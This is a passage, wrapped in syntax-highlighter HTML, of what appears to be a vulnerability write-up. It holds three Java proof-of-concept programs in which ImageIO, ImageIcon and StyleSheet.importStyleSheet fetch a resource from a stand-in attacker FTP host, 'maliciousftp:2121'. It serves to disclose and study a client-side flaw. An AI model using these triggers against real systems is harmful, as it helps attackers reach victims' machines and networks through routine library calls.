id=\"crayon-59a739de8f0a6660483781-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">IOException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">imageio<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ImageIO<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ImageIcon<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JFrame<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JLabel<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-9\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageReader<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Image <\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/test.jpg&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ImageIO<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">IOException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-19\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">JFrame <\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">JFrame<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-20\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setSize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">300<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">300<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">JLabel <\/span><span class=\"crayon-v\">label<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">JLabel<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageIcon<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">label<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-23\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setVisible<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-25\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0028 seconds] -->  <\/p>\n<p><strong>javax.swing.ImageIcon Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0a8039982121\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.net.MalformedURLException;  import java.net.URL;  import javax.swing.ImageIcon;    public class ImageXcon {   public static void main(String[] args) {    URL imgURL;    try {     imgURL = new URL(&#8220;ftp:\/\/maliciousftp:2121\/test&#8221;);     String description = &#8220;&#8221;;     ImageIcon icon = new ImageIcon(imgURL, description);    } catch (MalformedURLException e) {     e.printStackTrace();    }   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a8039982121-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a8039982121-16\">16<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ImageIcon<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-5\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageXcon<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">imgURL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-8\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-9\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">imgURL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/test&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">description<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">ImageIcon <\/span><span class=\"crayon-v\">icon<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageIcon<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">imgURL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">description<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-16\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p><strong>javax.swing.text.html.StyleSheet Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0ab081017809\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.net.MalformedURLException;  import java.net.URL;    import javax.swing.text.html.StyleSheet;    public class ImportStyla {     public static void main(String[] args) {    StyleSheet cs = new StyleSheet();    URL url;    try {     url = new URL(&#8220;ftp:\/\/maliciousftp:2121\/test&#8221;);     cs.importStyleSheet(url);    } catch (MalformedURLException e) {     e.printStackTrace();    }   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ab081017809-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ab081017809-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">StyleSheet<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-6\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImportStyla<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">StyleSheet <\/span><span class=\"crayon-v\">cs<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">StyleSheet<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/test&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">cs<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">importStyleSheet<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span 